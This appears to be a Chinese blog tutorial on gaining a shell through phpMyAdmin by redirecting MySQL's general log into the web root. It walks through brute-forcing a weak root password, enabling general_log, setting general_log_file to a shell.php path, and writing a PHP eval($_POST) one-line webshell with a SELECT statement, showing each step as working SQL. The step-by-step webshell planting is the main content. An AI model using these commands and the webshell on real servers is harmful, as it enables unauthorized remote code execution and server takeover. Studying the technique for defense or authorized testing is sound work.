phpMyAdmin简介phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的 。
GetSHELL前提1、phpMyAdmin利用日志文件GetSHELL前提账号必须有可读可写权限
2、MySQL版本大于5.0,MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL
3、满足上方两个条件,还需要知道网站的绝对路径,对于网站的绝对路径查找有很多方法,在我上一篇文章里有讲解到:传送门
GetSHELL过程
文章插图
这边是通过php探针获取到了网站的绝对路径:C:/phpStudy/WWW
文章插图
接着是通过弱口令爆破来得到了phpMyAdmin的登陆账号密码:root
文章插图
进入到phpMyAdmin管理页面后,得到一些关键信息:
- 数据库服务器:
- 网站服务器
查看日志的信息
文章插图
show variables like '%general%';日志读写默认是关闭的OFF,然后我们打开日志读写功能:
文章插图
打开general_log日志读写功能SET GLOBAL general_log='on'
文章插图
创建文件由于之前我们通过php探针得到了网站的绝对路径,然后我们就可以写入shell.php到网站的根目录下:
文章插图
SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'这个时候,对应的路径下就会生成一个shell.php脚本文件:
文章插图
写入一句话到shell.phpPHP一句话木马:
1<?php @eval($_POST[liuwx]);?>写入一句话语句:
1SELECT '<?php @eval($_POST[liuwx]);?>'
文章插图
这个时候就成功写入一句话到了shell.php里:
文章插图
成功GetSHELL:
文章插图
【phpMyAdmin利用日志文件GetSHELL】
推荐阅读
![[梁开心]让别人说去吧!,夜读人生:走自己的路](https://imgcdn.toutiaoyule.com/20200325/20200325145820998826a_t.jpeg)
- 利用树莓派搭建个人服务器
- 太阳能|马斯克:人类利用的太阳能太少 德州一个小角就能满足全美用电需求
- 利用Win+R命令进入Windows 10安全模式的方法
- 虚拟货币骗财案例 利用虚拟货币诈骗
- SpringMVC是如何利用拦截器防止SQL注入
- 小户型厨房的空间利用
- 盗茶出中国
- 如何利用地中海式风格装修打造夏日的蓝白清凉
- 茶叶最初是怎么被发现和利用的
- 如何快速搭建日志系统